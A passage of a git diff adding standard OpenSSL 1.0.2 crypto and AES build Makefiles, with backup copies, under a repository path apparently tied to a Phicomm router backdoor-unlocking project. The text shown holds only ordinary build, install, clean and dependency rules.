+$(LIB):	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	test -z "$(FIPSLIBDIR)" || $(AR) $(LIB) $(FIPSLIBDIR)fipscanister.o
+	$(RANLIB) $(LIB) || echo Never mind.
+
+shared: buildinf.h lib subdirs
+	if [ -n "$(SHARED_LIBS)" ]; then \
+		(cd ..; $(MAKE) $(SHARED_LIB)); \
+	fi
+
+libs:
+	@target=lib; $(RECURSIVE_MAKE)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ;\
+	do \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+	@target=install; $(RECURSIVE_MAKE)
+
+lint:
+	@target=lint; $(RECURSIVE_MAKE)
+
+depend:
+	@[ -z "$(THIS)" -o -f buildinf.h ] || touch buildinf.h # fake buildinf.h if it does not exist
+	@[ -z "$(THIS)" ] || $(MAKEDEPEND) -- $(CFLAG) $(INCLUDE) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+	@[ -z "$(THIS)" -o -s buildinf.h ] || rm buildinf.h
+	@[ -z "$(THIS)" ] || (set -e; target=depend; $(RECURSIVE_MAKE) )
+	@if [ -z "$(THIS)" ]; then $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; fi
+
+clean:
+	rm -f buildinf.h *.s *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+	@target=clean; $(RECURSIVE_MAKE)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f opensslconf.h
+	@target=dclean; $(RECURSIVE_MAKE)
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cpt_err.o: ../include/openssl/bio.h ../include/openssl/crypto.h
+cpt_err.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+cpt_err.o: ../include/openssl/lhash.h ../include/openssl/opensslconf.h
+cpt_err.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+cpt_err.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+cpt_err.o: ../include/openssl/symhacks.h cpt_err.c
+cryptlib.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+cryptlib.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+cryptlib.o: ../include/openssl/err.h ../include/openssl/lhash.h
+cryptlib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+cryptlib.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+cryptlib.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.c
+cryptlib.o: cryptlib.h
+cversion.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+cversion.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+cversion.o: ../include/openssl/err.h ../include/openssl/lhash.h
+cversion.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+cversion.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+cversion.o: ../include/openssl/stack.h ../include/openssl/symhacks.h buildinf.h
+cversion.o: cryptlib.h cversion.c
+ebcdic.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h ebcdic.c
+ex_data.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+ex_data.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+ex_data.o: ../include/openssl/err.h ../include/openssl/lhash.h
+ex_data.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ex_data.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+ex_data.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.h
+ex_data.o: ex_data.c
+fips_ers.o: ../include/openssl/opensslconf.h fips_ers.c
+mem.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+mem.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+mem.o: ../include/openssl/err.h ../include/openssl/lhash.h
+mem.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+mem.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+mem.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.h
+mem.o: mem.c
+mem_clr.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+mem_clr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+mem_clr.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+mem_clr.o: ../include/openssl/stack.h ../include/openssl/symhacks.h mem_clr.c
+mem_dbg.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+mem_dbg.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+mem_dbg.o: ../include/openssl/err.h ../include/openssl/lhash.h
+mem_dbg.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+mem_dbg.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+mem_dbg.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.h
+mem_dbg.o: mem_dbg.c
+o_dir.o: ../e_os.h ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+o_dir.o: LPdir_unix.c o_dir.c o_dir.h
+o_fips.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+o_fips.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+o_fips.o: ../include/openssl/err.h ../include/openssl/lhash.h
+o_fips.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+o_fips.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+o_fips.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.h
+o_fips.o: o_fips.c
+o_init.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/crypto.h
+o_init.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+o_init.o: ../include/openssl/lhash.h ../include/openssl/opensslconf.h
+o_init.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+o_init.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+o_init.o: ../include/openssl/symhacks.h o_init.c
+o_str.o: ../e_os.h ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+o_str.o: o_str.c o_str.h
+o_time.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h o_time.c
+o_time.o: o_time.h
+uid.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+uid.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+uid.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+uid.o: ../include/openssl/stack.h ../include/openssl/symhacks.h uid.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/Makefile.save b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/Makefile.save
new file mode 100644
index 0000000..9a39e93
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/Makefile.save
@@ -0,0 +1,216 @@
+#
+# OpenSSL/crypto/Makefile
+#
+
+DIR=		crypto
+TOP=		..
+CC=		cc
+INCLUDE=	-I. -I$(TOP) -I../include $(ZLIB_INCLUDE)
+# INCLUDES targets sudbirs!
+INCLUDES=	-I.. -I../.. -I../modes -I../asn1 -I../evp -I../../include $(ZLIB_INCLUDE)
+CFLAG=		-g
+MAKEDEPPROG=	makedepend
+MAKEDEPEND=	$(TOP)/util/domd $(TOP) -MD $(MAKEDEPPROG)
+MAKEFILE=       Makefile
+RM=             rm -f
+AR=		ar r
+
+RECURSIVE_MAKE=	[ -n "$(SDIRS)" ] && for i in $(SDIRS) ; do \
+		    (cd $$i && echo "making $$target in $(DIR)/$$i..." && \
+		    $(MAKE) -e TOP=../.. DIR=$$i INCLUDES='$(INCLUDES)' $$target ) || exit 1; \
+		done;
+
+PEX_LIBS=
+EX_LIBS=
+ 
+CFLAGS= $(INCLUDE) $(CFLAG)
+ASFLAGS= $(INCLUDE) $(ASFLAG)
+AFLAGS=$(ASFLAGS)
+CPUID_OBJ=mem_clr.o
+
+LIBS=
+
+GENERAL=Makefile README crypto-lib.com install.com
+TEST=constant_time_test.c
+
+LIB= $(TOP)/libcrypto.a
+SHARED_LIB= libcrypto$(SHLIB_EXT)
+LIBSRC=	cryptlib.c mem.c mem_clr.c mem_dbg.c cversion.c ex_data.c cpt_err.c \
+	ebcdic.c uid.c o_time.c o_str.c o_dir.c o_fips.c o_init.c fips_ers.c
+LIBOBJ= cryptlib.o mem.o mem_dbg.o cversion.o ex_data.o cpt_err.o ebcdic.o \
+	uid.o o_time.o o_str.o o_dir.o o_fips.o o_init.o fips_ers.o $(CPUID_OBJ)
+
+SRC= $(LIBSRC)
+
+EXHEADER= crypto.h opensslv.h opensslconf.h ebcdic.h symhacks.h \
+	ossl_typ.h
+HEADER=	cryptlib.h buildinf.h md32_common.h o_time.h o_str.h o_dir.h \
+	constant_time_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	@(cd ..; $(MAKE) DIRS=$(DIR) all)
+
+all: shared
+
+buildinf.h: ../Makefile
+	$(PERL) $(TOP)/util/mkbuildinf.pl "$(CC) $(CFLAGS)" "$(PLATFORM)" >buildinf.h
+
+x86cpuid.s:	x86cpuid.pl perlasm/x86asm.pl
+	$(PERL) x86cpuid.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+applink.o:	$(TOP)/ms/applink.c
+	$(CC) $(CFLAGS) -c -o $@ $(TOP)/ms/applink.c
+
+uplink.o:	$(TOP)/ms/uplink.c applink.o
+	$(CC) $(CFLAGS) -c -o $@ $(TOP)/ms/uplink.c
+
+uplink-x86.s:	$(TOP)/ms/uplink-x86.pl
+	$(PERL) $(TOP)/ms/uplink-x86.pl $(PERLASM_SCHEME) > $@
+
+x86_64cpuid.s: x86_64cpuid.pl;	$(PERL) x86_64cpuid.pl $(PERLASM_SCHEME) > $@
+ia64cpuid.s: ia64cpuid.S;	$(CC) $(CFLAGS) -E ia64cpuid.S > $@
+ppccpuid.s:	ppccpuid.pl;	$(PERL) ppccpuid.pl $(PERLASM_SCHEME) $@
+pariscid.s:	pariscid.pl;	$(PERL) pariscid.pl $(PERLASM_SCHEME) $@
+alphacpuid.s:	alphacpuid.pl
+	(preproc=$$$$.$@.S; trap "rm $$preproc" INT; \
+	$(PERL) alphacpuid.pl > $$preproc && \
+	$(CC) -E -P $$preproc > $@ && rm $$preproc)
+
+testapps:
+	[ -z "$(THIS)" ] || (	if echo $(SDIRS) | fgrep ' des '; \
+				then cd des && $(MAKE) -e des; fi )
+	[ -z "$(THIS)" ] || ( cd pkcs7 && $(MAKE) -e testapps );
+	@if [ -z "$(THIS)" ]; then $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; fi
+
+subdirs:
+	@target=all; $(RECURSIVE_MAKE)
+
+files:
+	$(PERL) $(TOP)/util/files.pl "CPUID_OBJ=$(CPUID_OBJ)" Makefile >> $(TOP)/MINFO
+	@target=files; $(RECURSIVE_MAKE)
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../apps $(APPS)
+	@target=links; $(RECURSIVE_MAKE)
+
+# lib: $(LIB): are splitted to avoid end-less loop
+lib:	$(LIB)
+	@touch lib
+$(LIB):	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	test -z "$(FIPSLIBDIR)" || $(AR) $(LIB) $(FIPSLIBDIR)fipscanister.o
+	$(RANLIB) $(LIB) || echo Never mind.
+
+shared: buildinf.h lib subdirs
+	if [ -n "$(SHARED_LIBS)" ]; then \
+		(cd ..; $(MAKE) $(SHARED_LIB)); \
+	fi
+
+libs:
+	@target=lib; $(RECURSIVE_MAKE)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ;\
+	do \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+	@target=install; $(RECURSIVE_MAKE)
+
+lint:
+	@target=lint; $(RECURSIVE_MAKE)
+
+depend:
+	@[ -z "$(THIS)" -o -f buildinf.h ] || touch buildinf.h # fake buildinf.h if it does not exist
+	@[ -z "$(THIS)" ] || $(MAKEDEPEND) -- $(CFLAG) $(INCLUDE) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+	@[ -z "$(THIS)" -o -s buildinf.h ] || rm buildinf.h
+	@[ -z "$(THIS)" ] || (set -e; target=depend; $(RECURSIVE_MAKE) )
+	@if [ -z "$(THIS)" ]; then $(MAKE) -f $(TOP)/Makefile reflect THIS=$@; fi
+
+clean:
+	rm -f buildinf.h *.s *.o */*.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+	@target=clean; $(RECURSIVE_MAKE)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+	rm -f opensslconf.h
+	@target=dclean; $(RECURSIVE_MAKE)
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+cpt_err.o: ../include/openssl/bio.h ../include/openssl/crypto.h
+cpt_err.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+cpt_err.o: ../include/openssl/lhash.h ../include/openssl/opensslconf.h
+cpt_err.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+cpt_err.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+cpt_err.o: ../include/openssl/symhacks.h cpt_err.c
+cryptlib.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+cryptlib.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+cryptlib.o: ../include/openssl/err.h ../include/openssl/lhash.h
+cryptlib.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+cryptlib.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+cryptlib.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.c
+cryptlib.o: cryptlib.h
+cversion.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+cversion.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+cversion.o: ../include/openssl/err.h ../include/openssl/lhash.h
+cversion.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+cversion.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+cversion.o: ../include/openssl/stack.h ../include/openssl/symhacks.h buildinf.h
+cversion.o: cryptlib.h cversion.c
+ebcdic.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h ebcdic.c
+ex_data.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+ex_data.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+ex_data.o: ../include/openssl/err.h ../include/openssl/lhash.h
+ex_data.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+ex_data.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+ex_data.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.h
+ex_data.o: ex_data.c
+fips_ers.o: ../include/openssl/opensslconf.h fips_ers.c
+mem.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+mem.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+mem.o: ../include/openssl/err.h ../include/openssl/lhash.h
+mem.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+mem.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+mem.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.h
+mem.o: mem.c
+mem_clr.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+mem_clr.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+mem_clr.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+mem_clr.o: ../include/openssl/stack.h ../include/openssl/symhacks.h mem_clr.c
+mem_dbg.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+mem_dbg.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+mem_dbg.o: ../include/openssl/err.h ../include/openssl/lhash.h
+mem_dbg.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+mem_dbg.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+mem_dbg.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.h
+mem_dbg.o: mem_dbg.c
+o_dir.o: ../e_os.h ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+o_dir.o: LPdir_unix.c o_dir.c o_dir.h
+o_fips.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/buffer.h
+o_fips.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+o_fips.o: ../include/openssl/err.h ../include/openssl/lhash.h
+o_fips.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+o_fips.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+o_fips.o: ../include/openssl/stack.h ../include/openssl/symhacks.h cryptlib.h
+o_fips.o: o_fips.c
+o_init.o: ../e_os.h ../include/openssl/bio.h ../include/openssl/crypto.h
+o_init.o: ../include/openssl/e_os2.h ../include/openssl/err.h
+o_init.o: ../include/openssl/lhash.h ../include/openssl/opensslconf.h
+o_init.o: ../include/openssl/opensslv.h ../include/openssl/ossl_typ.h
+o_init.o: ../include/openssl/safestack.h ../include/openssl/stack.h
+o_init.o: ../include/openssl/symhacks.h o_init.c
+o_str.o: ../e_os.h ../include/openssl/e_os2.h ../include/openssl/opensslconf.h
+o_str.o: o_str.c o_str.h
+o_time.o: ../include/openssl/e_os2.h ../include/openssl/opensslconf.h o_time.c
+o_time.o: o_time.h
+uid.o: ../include/openssl/crypto.h ../include/openssl/e_os2.h
+uid.o: ../include/openssl/opensslconf.h ../include/openssl/opensslv.h
+uid.o: ../include/openssl/ossl_typ.h ../include/openssl/safestack.h
+uid.o: ../include/openssl/stack.h ../include/openssl/symhacks.h uid.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/Makefile b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/Makefile
new file mode 100644
index 0000000..709b1af
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/Makefile
@@ -0,0 +1,169 @@
+#
+# crypto/aes/Makefile
+#
+
+DIR=	aes
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+AES_ENC=aes_core.o aes_cbc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+#TEST=aestest.c
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=aes_core.c aes_misc.c aes_ecb.c aes_cbc.c aes_cfb.c aes_ofb.c \
+       aes_ctr.c aes_ige.c aes_wrap.c
+LIBOBJ=aes_misc.o aes_ecb.o aes_cfb.o aes_ofb.o aes_ctr.o aes_ige.o aes_wrap.o \
+       $(AES_ENC)
+
+SRC= $(LIBSRC)
+
+EXHEADER= aes.h
+HEADER= aes_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+aes-ia64.s: asm/aes-ia64.S
+	$(CC) $(CFLAGS) -E asm/aes-ia64.S > $@
+
+aes-586.s:	asm/aes-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/aes-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+vpaes-x86.s:	asm/vpaes-x86.pl ../perlasm/x86asm.pl
+	$(PERL) asm/vpaes-x86.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+aesni-x86.s:	asm/aesni-x86.pl ../perlasm/x86asm.pl
+	$(PERL) asm/aesni-x86.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+aes-x86_64.s: asm/aes-x86_64.pl
+	$(PERL) asm/aes-x86_64.pl $(PERLASM_SCHEME) > $@
+vpaes-x86_64.s:	asm/vpaes-x86_64.pl
+	$(PERL) asm/vpaes-x86_64.pl $(PERLASM_SCHEME) > $@
+bsaes-x86_64.s:	asm/bsaes-x86_64.pl
+	$(PERL) asm/bsaes-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-x86_64.s: asm/aesni-x86_64.pl
+	$(PERL) asm/aesni-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-sha1-x86_64.s:	asm/aesni-sha1-x86_64.pl
+	$(PERL) asm/aesni-sha1-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-sha256-x86_64.s:	asm/aesni-sha256-x86_64.pl
+	$(PERL) asm/aesni-sha256-x86_64.pl $(PERLASM_SCHEME) > $@
+aesni-mb-x86_64.s:	asm/aesni-mb-x86_64.pl
+	$(PERL) asm/aesni-mb-x86_64.pl $(PERLASM_SCHEME) > $@
+
+aes-sparcv9.s: asm/aes-sparcv9.pl
+	$(PERL) asm/aes-sparcv9.pl $(CFLAGS) > $@
+aest4-sparcv9.s: asm/aest4-sparcv9.pl
+	$(PERL) asm/aest4-sparcv9.pl $(CFLAGS) > $@
+
+aes-ppc.s:	asm/aes-ppc.pl
+	$(PERL) asm/aes-ppc.pl $(PERLASM_SCHEME) $@
+vpaes-ppc.s:	asm/vpaes-ppc.pl
+	$(PERL) asm/vpaes-ppc.pl $(PERLASM_SCHEME) $@
+aesp8-ppc.s:	asm/aesp8-ppc.pl
+	$(PERL) asm/aesp8-ppc.pl $(PERLASM_SCHEME) $@
+
+aes-parisc.s:	asm/aes-parisc.pl
+	$(PERL) asm/aes-parisc.pl $(PERLASM_SCHEME) $@
+
+aes-mips.S:	asm/aes-mips.pl
+	$(PERL) asm/aes-mips.pl $(PERLASM_SCHEME) $@
+
+aesv8-armx.S:	asm/aesv8-armx.pl
+	$(PERL) asm/aesv8-armx.pl $(PERLASM_SCHEME) $@
+aesv8-armx.o:	aesv8-armx.S
+
+# GNU make "catch all"
+aes-%.S:	asm/aes-%.pl;	$(PERL) $< $(PERLASM_SCHEME) > $@
+aes-armv4.o:	aes-armv4.S
+bsaes-%.S:	asm/bsaes-%.pl;	$(PERL) $< $(PERLASM_SCHEME) $@
+bsaes-armv7.o:	bsaes-armv7.S
+
+files:
+	$(PERL) $(TOP)/util/files.pl "AES_ENC=$(AES_ENC)" Makefile >> $(TOP)/MINFO
+
+links:
+	@$(PERL) $(TOP)/util/mklink.pl ../../include/openssl $(EXHEADER)
+	@$(PERL) $(TOP)/util/mklink.pl ../../test $(TEST)
+	@$(PERL) $(TOP)/util/mklink.pl ../../apps $(APPS)
+
+install:
+	@[ -n "$(INSTALLTOP)" ] # should be set by top Makefile...
+	@headerlist="$(EXHEADER)"; for i in $$headerlist ; \
+	do  \
+	(cp $$i $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i; \
+	chmod 644 $(INSTALL_PREFIX)$(INSTALLTOP)/include/openssl/$$i ); \
+	done;
+
+tags:
+	ctags $(SRC)
+
+tests:
+
+lint:
+	lint -DLINT $(INCLUDES) $(SRC)>fluff
+
+depend:
+	@[ -n "$(MAKEDEPEND)" ] # should be set by upper Makefile...
+	$(MAKEDEPEND) -- $(CFLAG) $(INCLUDES) $(DEPFLAG) -- $(PROGS) $(LIBSRC)
+
+dclean:
+	$(PERL) -pe 'if (/^# DO NOT DELETE THIS LINE/) {print; exit(0);}' $(MAKEFILE) >Makefile.new
+	mv -f Makefile.new $(MAKEFILE)
+
+clean:
+	rm -f *.s *.o *.obj lib tags core .pure .nfs* *.old *.bak fluff
+
+# DO NOT DELETE THIS LINE -- make depend depends on it.
+
+aes_cbc.o: ../../include/openssl/aes.h ../../include/openssl/modes.h
+aes_cbc.o: ../../include/openssl/opensslconf.h aes_cbc.c
+aes_cfb.o: ../../include/openssl/aes.h ../../include/openssl/modes.h
+aes_cfb.o: ../../include/openssl/opensslconf.h aes_cfb.c
+aes_core.o: ../../include/openssl/aes.h ../../include/openssl/e_os2.h
+aes_core.o: ../../include/openssl/opensslconf.h aes_core.c aes_locl.h
+aes_ctr.o: ../../include/openssl/aes.h ../../include/openssl/modes.h
+aes_ctr.o: ../../include/openssl/opensslconf.h aes_ctr.c
+aes_ecb.o: ../../include/openssl/aes.h ../../include/openssl/e_os2.h
+aes_ecb.o: ../../include/openssl/opensslconf.h aes_ecb.c aes_locl.h
+aes_ige.o: ../../e_os.h ../../include/openssl/aes.h ../../include/openssl/bio.h
+aes_ige.o: ../../include/openssl/buffer.h ../../include/openssl/crypto.h
+aes_ige.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+aes_ige.o: ../../include/openssl/lhash.h ../../include/openssl/opensslconf.h
+aes_ige.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+aes_ige.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+aes_ige.o: ../../include/openssl/symhacks.h ../cryptlib.h aes_ige.c aes_locl.h
+aes_misc.o: ../../include/openssl/aes.h ../../include/openssl/crypto.h
+aes_misc.o: ../../include/openssl/e_os2.h ../../include/openssl/opensslconf.h
+aes_misc.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+aes_misc.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+aes_misc.o: ../../include/openssl/symhacks.h aes_locl.h aes_misc.c
+aes_ofb.o: ../../include/openssl/aes.h ../../include/openssl/modes.h
+aes_ofb.o: ../../include/openssl/opensslconf.h aes_ofb.c
+aes_wrap.o: ../../e_os.h ../../include/openssl/aes.h
+aes_wrap.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+aes_wrap.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+aes_wrap.o: ../../include/openssl/err.h ../../include/openssl/lhash.h
+aes_wrap.o: ../../include/openssl/modes.h ../../include/openssl/opensslconf.h
+aes_wrap.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+aes_wrap.o: ../../include/openssl/safestack.h ../../include/openssl/stack.h
+aes_wrap.o: ../../include/openssl/symhacks.h ../cryptlib.h aes_wrap.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/Makefile.bak
new file mode 100644
index 0000000..709b1af
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/aes/Makefile.bak
@@ -0,0 +1,169 @@
+#
+# crypto/aes/Makefile
+#
+
+DIR=	aes
+TOP=	../..
+CC=	cc
+CPP=	$(CC) -E
+INCLUDES=
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+AES_ENC=aes_core.o aes_cbc.o
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+ASFLAGS= $(INCLUDES) $(ASFLAG)
+AFLAGS= $(ASFLAGS)
+
+GENERAL=Makefile
+#TEST=aestest.c
+TEST=
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=aes_core.c aes_misc.c aes_ecb.c aes_cbc.c aes_cfb.c aes_ofb.c \
+       aes_ctr.c aes_ige.c aes_wrap.c
+LIBOBJ=aes_misc.o aes_ecb.o aes_cfb.o aes_ofb.o aes_ctr.o aes_ige.o aes_wrap.o \
+       $(AES_ENC)
+
+SRC= $(LIBSRC)
+
+EXHEADER= aes.h
+HEADER= aes_locl.h $(EXHEADER)
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+aes-ia64.s: asm/aes-ia64.S
+	$(CC) $(CFLAGS) -E asm/aes-ia64.S > $@
+
+aes-586.s:	asm/aes-586.pl ../perlasm/x86asm.pl
+	$(PERL) asm/aes-586.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+vpaes-x86.s:	asm/vpaes-x86.pl ../perlasm/x86asm.pl
+	$(PERL) asm/vpaes-x86.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+aesni-x86.s:	asm/aesni-x86.pl ../perlasm/x86asm.pl
+	$(PERL) asm/aesni-x86.pl $(PERLASM_SCHEME) $(CFLAGS) $(PROCESSOR) > $@
+
+aes-x86_64.s: asm/aes-x86_64.pl
+	$(PERL) asm/aes-x86_64.pl $(PERLASM_SCHEME) > $@
+vpaes-x86_64.s:	asm/vpaes-x86_64.pl
+	$(PERL) asm/vpaes-x86_64.pl $(PERLASM_SCHEME) > $@
+bsaes-x86_64.s:	asm/bsaes-x86_64.pl
